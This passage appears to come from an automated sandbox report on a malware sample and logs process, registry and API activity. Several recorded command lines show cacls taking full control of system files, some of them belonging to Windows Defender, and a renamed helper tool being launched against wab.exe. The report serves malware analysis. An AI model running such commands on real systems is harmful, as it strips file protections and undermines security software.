| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x75b75c60 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x75b74810 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x74b807d0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x74b8e6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x74b79080 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x74b9ab40 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x74b83570 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x74ba09b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x74ba2bec |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x74b7d0c0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x74b793b0 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x744a1590 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x744a1510 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x744a1570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x75ea4ae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x75ea4b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75ea4b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75ea4b40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75efebc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75efeb20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75efeb80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x75ea6700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x75ea6d30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77bfd7c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77bfb840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77bfb740 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75ea6d70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77bfc0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77bfbe10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77c22b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77c18e50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77c152f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x75ea71b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x75ea4510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x7500d900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x75ea49a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x75ea7050 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x75ea7760 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x75ea7190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x75ea7780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x75ea72c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x75ea7440 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75ea7480 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f9e260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75ea0db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x75ea5a20 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-04-17 10:41:25 (UTC) |
|
1 | |
| Get Time | type = Performance Ctr, time = 23795210336 |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #122: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #122 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G FD1HVy:F /C |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:02:58, Reason: Child Process |
| Unmonitor | End Time: 00:03:22, Reason: Self Terminated |
| Monitor Duration | 00:00:23 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf78 |
| Parent PID | 0x10cc (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1144
0x
112C
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cacls.exe | 0x00AC0000 | 0x00AC9FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #123: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #123 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui" /E /G FD1HVy:F /C |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:02:58, Reason: Child Process |
| Unmonitor | End Time: 00:03:22, Reason: Self Terminated |
| Monitor Duration | 00:00:23 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1100 |
| Parent PID | 0xeb4 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
117C
0x
10B0
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cacls.exe | 0x00AC0000 | 0x00AC9FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #124: cmd.exe
58
0
| Information | Value |
|---|---|
| ID | #124 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\WINDOWS\system32\cmd.exe /c mxkeFu6a.exe -accepteula "wab.exe" -nobanner |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:02:58, Reason: Child Process |
| Unmonitor | End Time: 00:03:08, Reason: Self Terminated |
| Monitor Duration | 00:00:09 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1158 |
| Parent PID | 0x13cc (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
10FC
0x
10AC
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00CD0000 | 0x00D28FFF | Process Termination | - | 32-bit | - |
|
|
|
Host Behavior
File (13)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
2 | |
| Get Info | mxkeFu6a.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
6 | |
| Open | STD_INPUT_HANDLE | - |
|
4 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 216, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\Desktop\mxkeFu6a.exe | os_pid = 0x1264, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #125: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #125 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G FD1HVy:F /C |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:00, Reason: Child Process |
| Unmonitor | End Time: 00:03:22, Reason: Self Terminated |
| Monitor Duration | 00:00:22 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x10a8 |
| Parent PID | 0x1124 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
DB8
0x
1270
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cacls.exe | 0x00AC0000 | 0x00AC9FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #126: mxkefu6a.exe
177
0
| Information | Value |
|---|---|
| ID | #126 |
| File Name | c:\users\fd1hvy\desktop\mxkefu6a.exe |
| Command Line | mxkeFu6a.exe -accepteula "wab.exe" -nobanner |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:00, Reason: Child Process |
| Unmonitor | End Time: 00:03:06, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1264 |
| Parent PID | 0x1158 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
12EC
0x
12F4
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x004080C0 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040AE73 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040579A |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040B435 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00409AC9 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040608C |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040DEC6 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00410AB1 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00412434 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00416A09, 0x00415F2F, ... |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x004048D4 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040C3C0, 0x004112CE |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x004020F0 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Process Termination | - | 32-bit | - |
|
|
|
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\AppData\Local\Temp\mxkeFu6a64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75e90000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x761b0000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x750d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75b70000 |
|
1 | |
| Load | USER32.dll | base_address = 0x74b70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x744a0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\fd1hvy\desktop\mxkefu6a.exe, file_name_orig = C:\Users\FD1HVy\Desktop\mxkeFu6a.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x75efec50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75efeca0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x75ea1170 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75efeac0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75ea4be0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75efeb30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x75ea4610 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x75ea4a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75efeed0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75ea5490 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x75efed40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x75ea6520 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77c0a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75ea5a60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x75ea53b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x75ea6800 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x75ea5cc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x75ea56c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75efed10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75ea4aa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75ea6740 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75efeab0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75ea4f00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x75ea5b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75ea5010 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75efea10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75ea5bc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x75ea4cc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75ea50d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x75ea5ae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x75ea5330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x75ea5b40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75ea5b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75ea51b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75ea5090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x75eff5a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75efef60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x75ea5d10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x75eff4c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75eff500 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75eff130 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77bfb2d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77bfb250 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x75ea6620 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77bf2dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77c129e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77c11ec0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x75ea3cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75ea5110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75ea5c40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x75ea6b10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x75ea57f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75eff450 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x75eff4a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75eff4e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75ea46b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75ea8820 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77c16390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75ea5ac0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77bdfb90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x75efee70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75eff180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75eff440 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75ea5960 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x75eff090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x75ea5320 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x75ea68d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x75ea6720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75efebb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x75ea6760 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x75ea67e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75ea6820 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75ea6850 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75ea6870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75ea6830 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x75ea59c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75ea4ca0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x75ea5160 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75ea4d10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75ea51f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75ea7c10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75ea5da0 |
|
1 | |
